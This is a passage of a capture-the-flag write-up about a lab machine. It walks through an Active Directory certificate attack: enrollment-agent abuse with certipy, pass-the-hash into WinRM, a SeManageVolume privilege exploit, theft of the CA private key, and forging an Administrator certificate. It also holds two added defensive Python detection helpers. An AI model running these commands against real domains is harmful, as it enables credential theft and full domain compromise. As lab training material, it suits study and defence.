└─$ certipy req -u 'Lion.SK@certificate.htb' -p '!QAZ2wsx'  -dc-ip '10.129.93.221' -target 'dc01.certificate.htb' -ca 'Certificate-LTD-CA' -template 'Delegated-CRA'
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 21
[*] Successfully requested certificate
[*] Got certificate with UPN 'Lion.SK@certificate.htb'
[*] Certificate object SID is 'S-1-5-21-515537669-4223687196-3249690583-1115'
[*] Saving certificate and private key to 'lion.sk.pfx'
[*] Wrote certificate and private key to 'lion.sk.pfx'
Step 2: Use the Enrollment Agent certificate to request a certificate on behalf of the target user. The attacker uses their lion.sk.pfx (the agent certificate obtained in Step 1) to request a certificate from the SignedUser template (or another suitable agent-enrollable target template) on behalf of certificate\ryan.k.
└─$ certipy req -u 'Lion.SK@certificate.htb' -p '!QAZ2wsx' -dc-ip '10.129.93.221' -target 'dc01.certificate.htb' -ca 'Certificate-LTD-CA' -template 'SignedUser' -pfx lion.sk.pfx -on-behalf-of 'certificate\ryan.k'
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 23
[*] Successfully requested certificate
[*] Got certificate with UPN 'ryan.k@certificate.htb'
[*] Certificate object SID is 'S-1-5-21-515537669-4223687196-3249690583-1117'
[*] Saving certificate and private key to 'ryan.k.pfx'
[*] Wrote certificate and private key to 'ryan.k.pfx'
Step 3: Authenticate using the "on-behalf-of" certificate. The attacker uses the ryan.k.pfx (obtained in Step 2) to authenticate as ryan.k.
└─$ certipy auth -pfx ryan.k.pfx -dc-ip '10.129.93.221'
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*]     SAN UPN: 'ryan.k@certificate.htb'
[*]     Security Extension SID: 'S-1-5-21-515537669-4223687196-3249690583-1117'
[*] Using principal: 'ryan.k@certificate.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'ryan.k.ccache'
[*] Wrote credential cache to 'ryan.k.ccache'
[*] Trying to retrieve NT hash for 'ryan.k'
[*] Got hash for 'ryan.k@certificate.htb': aad3b435b51404eeaad3b435b51404ee:b1bc3d70e70f4f36b1509a65ae1a2ae6
Now we can WinRM in with the NT hash, and we are in as ryan.k:
└─$ evil-winrm -i 10.129.93.221 -u ryan.k -H b1bc3d70e70f4f36b1509a65ae1a2ae6
Shell as Administrator
SeManageVolume
*Evil-WinRM* PS C:\Users\Ryan.K\Desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                      State
============================= ================================ =======
SeMachineAccountPrivilege     Add workstations to domain       Enabled
SeChangeNotifyPrivilege       Bypass traverse checking         Enabled
SeManageVolumePrivilege       Perform volume maintenance tasks Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set   Enabled
*Evil-WinRM* PS C:\Users\Ryan.K\Desktop>
According to Microsoft, SeManageVolumePrivilege is described as follows:
This policy setting determines which users can perform volume or disk management tasks, such as defragmenting an existing volume, creating or removing volumes, and running the Disk Cleanup tool. Use caution when assigning this user right. Users with this user right can explore disks and extend files in to memory that contains other data. When the extended files are opened, the user might be able to read and modify the acquired data.
Basically, this privilege gives access to the disks.
I found the CsEnox exploit; let's download it, copy it onto the box and run it.

Now I am able to view the Administrator's files:
    Directory: C:\Users\Administrator\Desktop
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         6/1/2025  10:17 PM             34 root.txt
I can see it, but I could not read root.txt.
Maybe a drive-level filter is in place.
Stored ("My") certificates
We can view the "My" store (also known as the Personal certificate store) for the current user.
*Evil-WinRM* PS C:\Users\Ryan.K\Documents> certutil -store my
my "Personal"
================ Certificate 0 ================
Archived!
Serial Number: 472cb6148184a9894f6d4d2587b1b165
Issuer: CN=certificate-DC01-CA, DC=certificate, DC=htb
 NotBefore: 11/3/2024 3:30 PM
 NotAfter: 11/3/2029 3:40 PM
Subject: CN=certificate-DC01-CA, DC=certificate, DC=htb
CA Version: V0.0
Signature matches Public Key
Root Certificate: Subject matches Issuer
Cert Hash(sha1): 82ad1e0c20a332c8d6adac3e5ea243204b85d3a7
  Key Container = certificate-DC01-CA
  Provider = Microsoft Software Key Storage Provider
Missing stored keyset
================ Certificate 1 ================
Serial Number: 5800000002ca70ea4e42f218a6000000000002
Issuer: CN=Certificate-LTD-CA, DC=certificate, DC=htb
 NotBefore: 11/3/2024 8:14 PM
 NotAfter: 11/3/2025 8:14 PM
Subject: CN=DC01.certificate.htb
Certificate Template Name (Certificate Type): DomainController
Non-root Certificate
Template: DomainController, Domain Controller
Cert Hash(sha1): 779a97b1d8e492b5bafebc02338845ffdff76ad2
  Key Container = 46f11b4056ad38609b08d1dea6880023_7989b711-2e3f-4107-9aae-fb8df2e3b958
  Provider = Microsoft RSA SChannel Cryptographic Provider
Missing stored keyset
================ Certificate 2 ================
Serial Number: 75b2f4bbf31f108945147b466131bdca
Issuer: CN=Certificate-LTD-CA, DC=certificate, DC=htb
 NotBefore: 11/3/2024 3:55 PM
 NotAfter: 11/3/2034 4:05 PM
Subject: CN=Certificate-LTD-CA, DC=certificate, DC=htb
Certificate Template Name (Certificate Type): CA
CA Version: V0.0
Signature matches Public Key
Root Certificate: Subject matches Issuer
Template: CA, Root Certification Authority
Cert Hash(sha1): 2f02901dcff083ed3dbb6cb0a15bbfee6002b1a8
  Key Container = Certificate-LTD-CA
  Provider = Microsoft Software Key Storage Provider
Missing stored keyset
CertUtil: -store command completed successfully.
Here we can see Certificate-LTD-CA.
That is unusual, because the "My" store is intended for end-entity certificates (your own certificates, which usually have a private key).
If we can export Certificate-LTD-CA together with its private key, we can forge a certificate for Administrator and use it to obtain that account's hash. For that:
- we need to export Certificate-LTD-CA as a PFX.
Exporting fails; it seems we do not have the private key (or we do not have access to it).
*Evil-WinRM* PS C:\Users\Ryan.K\Documents> certutil -exportpfx my "75b2f4bbf31f108945147b466131bdca" ca_exported.pfx
my "Personal"
================ Certificate 2 ================
Serial Number: 75b2f4bbf31f108945147b466131bdca
Issuer: CN=Certificate-LTD-CA, DC=certificate, DC=htb
 NotBefore: 11/3/2024 3:55 PM
 NotAfter: 11/3/2034 4:05 PM
Subject: CN=Certificate-LTD-CA, DC=certificate, DC=htb
Certificate Template Name (Certificate Type): CA
CA Version: V0.0
Signature matches Public Key
Root Certificate: Subject matches Issuer
Template: CA, Root Certification Authority
Cert Hash(sha1): 2f02901dcff083ed3dbb6cb0a15bbfee6002b1a8
  Key Container = Certificate-LTD-CA
  Provider = Microsoft Software Key Storage Provider
Missing stored keyset
Enter new password for output file ca_exported.pfx:
Enter new password:
Confirm new password:
CertUtil: -exportPFX command FAILED: 0x80090016 (-2146893802 NTE_BAD_KEYSET)
CertUtil: Keyset does not exist
So we use ./SeManageVolumeExploit.exe, which abuses the SeManageVolumePrivilege to loosen the ACLs on the C: drive, to give Ryan permission to read the CA's private key.
*Evil-WinRM* PS C:\Users\Ryan.K\Documents> ./SeManageVolumeExploit.exe
Entries changed: 836
DONE
*Evil-WinRM* PS C:\Users\Ryan.K\Documents> certutil -key "Certificate-LTD-CA"
Microsoft Strong Cryptographic Provider:
  Certificate-LTD-CA
cuLoadKey: LoadKeys returned Keyset does not exist 0x80090016 (-2146893802 NTE_BAD_KEYSET) -- Certificate-LTD-CA
CertUtil: -key command completed successfully.
*Evil-WinRM* PS C:\Users\Ryan.K\Documents> certutil -exportpfx my "75b2f4bbf31f108945147b466131bdca" ca_exported.pfx
my "Personal"
================ Certificate 2 ================
Serial Number: 75b2f4bbf31f108945147b466131bdca
Issuer: CN=Certificate-LTD-CA, DC=certificate, DC=htb
 NotBefore: 11/3/2024 3:55 PM
 NotAfter: 11/3/2034 4:05 PM
Subject: CN=Certificate-LTD-CA, DC=certificate, DC=htb
Certificate Template Name (Certificate Type): CA
CA Version: V0.0
Signature matches Public Key
Root Certificate: Subject matches Issuer
Template: CA, Root Certification Authority
Cert Hash(sha1): 2f02901dcff083ed3dbb6cb0a15bbfee6002b1a8
  Key Container = Certificate-LTD-CA
  Unique container name: 26b68cbdfcd6f5e467996e3f3810f3ca_7989b711-2e3f-4107-9aae-fb8df2e3b958
  Provider = Microsoft Software Key Storage Provider
Signature test passed
Enter new password for output file ca_exported.pfx:
Enter new password:
Confirm new password:
CertUtil: -exportPFX command completed successfully.
*Evil-WinRM* PS C:\Users\Ryan.K\Documents> dir
    Directory: C:\Users\Ryan.K\Documents
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         6/2/2025   6:18 AM           2675 ca_exported.pfx
-a----         6/2/2025   6:16 AM          12288 SeManageVolumeExploit.exe
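An added audit helper (not from this writeup) that parses `certutil -store my` output like the listings above and reports CA certificates whose private key is usable from the Personal store: the state after the exploit ran ("Signature test passed"), not before ("Missing stored keyset"). The sample text is a constructed excerpt in the shape of the output above.

```python
# Added example, not from the original writeup: parse `certutil -store my`
# output and flag self-signed CA certificates whose private key is usable from
# the Personal store, the condition that enabled the export above.
import re

# Constructed excerpt in the shape of the certutil output shown above.
SAMPLE = """\
my "Personal"
================ Certificate 1 ================
Serial Number: 5800000002ca70ea4e42f218a6000000000002
Issuer: CN=Certificate-LTD-CA, DC=certificate, DC=htb
Subject: CN=DC01.certificate.htb
Non-root Certificate
Missing stored keyset
================ Certificate 2 ================
Serial Number: 75b2f4bbf31f108945147b466131bdca
Issuer: CN=Certificate-LTD-CA, DC=certificate, DC=htb
Subject: CN=Certificate-LTD-CA, DC=certificate, DC=htb
Root Certificate: Subject matches Issuer
  Key Container = Certificate-LTD-CA
Signature test passed
CertUtil: -store command completed successfully.
"""

def parse_store(text):
    """One dict per '==== Certificate N ====' block."""
    certs, cur = [], None
    for line in text.splitlines():
        m = re.match(r"=+ Certificate (\d+) =+", line)
        if m:
            cur = {"index": int(m.group(1)), "root": False, "key_usable": False}
            certs.append(cur)
        elif cur is None:
            continue
        elif line.startswith("Serial Number:"):
            cur["serial"] = line.split(":", 1)[1].strip()
        elif line.startswith("Subject:"):
            cur["subject"] = line.split(":", 1)[1].strip()
        elif line.startswith("Root Certificate:"):
            cur["root"] = True          # subject == issuer: a CA certificate
        elif line.strip() == "Signature test passed":
            cur["key_usable"] = True    # certutil loaded and used the private key
    return certs

def exportable_ca_certs(text):
    """Serials of CA certs whose key is usable here; an empty list is the
    healthy state for a user's Personal store."""
    return [c["serial"] for c in parse_store(text) if c["root"] and c["key_usable"]]
```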
- Now we transfer the PFX file to our machine and forge an Administrator certificate with certipy:
└─$ certipy forge -ca-pfx ca_exported.pfx -upn ADMINISTRATOR@CERTIFICATE.HTB -subject 'CN=ADMINISTRATOR,CN=USERS,DC=CERTIFICATE,DC=HTB'
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Saving forged certificate and private key to 'administrator_forged.pfx'
[*] Wrote forged certificate and private key to 'administrator_forged.pfx'
- Now, using administrator_forged.pfx, we try to authenticate:
└─$ certipy auth -pfx administrator_forged.pfx -dc-ip '10.129.249.191'                                   
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*]     SAN UPN: 'ADMINISTRATOR@CERTIFICATE.HTB'
[*] Using principal: 'administrator@certificate.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@certificate.htb': aad3b435b51404eeaad3b435b51404ee:d804304519bf0143c14cbf1c024408c6
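A defender's-side check for the forgery above, as an added example that is not part of this writeup: a golden certificate is never recorded in the CA database, so a certificate logon whose serial the CA never issued stands out. The field names CertIssuerName/CertSerialNumber follow the 4768 event data; the events, the CA database export and every serial except the DC01 one from the listing above are constructed.

```python
# Added example, not part of the original writeup: a forged ("golden")
# certificate never passes through the CA, so its serial number is absent from
# the CA database. Flag PKINIT logons (event 4768 with certificate data) that
# name our CA as issuer but carry a serial the CA never issued.
import re

# Constructed export of the CA database (serial -> subject); the one entry is
# the DC01 certificate serial seen in the certutil listing above.
ISSUED_BY_CA = {
    "5800000002ca70ea4e42f218a6000000000002": "CN=DC01.certificate.htb",
}
CA_ISSUER = "Certificate-LTD-CA"

# Constructed 4768 events, reduced to the EventData fields that matter here.
EVENTS = [
    {"TargetUserName": "DC01$", "CertIssuerName": "Certificate-LTD-CA",
     "CertSerialNumber": "58 00 00 00 02 ca 70 ea 4e 42 f2 18 a6 00 00 00 00 00 02"},
    {"TargetUserName": "administrator", "CertIssuerName": "Certificate-LTD-CA",
     "CertSerialNumber": "1a2b3c4d5e6f70819293a4b5c6d7e8f9"},  # placeholder, never issued
    {"TargetUserName": "ryan.k", "CertIssuerName": "", "CertSerialNumber": ""},  # password logon
]

def norm(serial):
    """Serials are logged with or without separators; compare in one form."""
    return re.sub(r"[^0-9a-f]", "", serial.lower())

def suspicious_pkinit_logons(events, issued=ISSUED_BY_CA, ca=CA_ISSUER):
    """Return (user, serial) for certificate logons that claim our CA as the
    issuer but whose serial is not in the CA database."""
    known = {norm(s) for s in issued}
    hits = []
    for ev in events:
        serial = ev.get("CertSerialNumber", "")
        if not serial or ev.get("CertIssuerName") != ca:
            continue  # not a certificate logon, or issued by a different CA
        if norm(serial) not in known:
            hits.append((ev["TargetUserName"], serial))
    return hits
```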
- Log in as Administrator, and we have root.txt:

    Directory: C:\Users\Administrator\Desktop
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         6/1/2025   4:45 PM             34 root.txt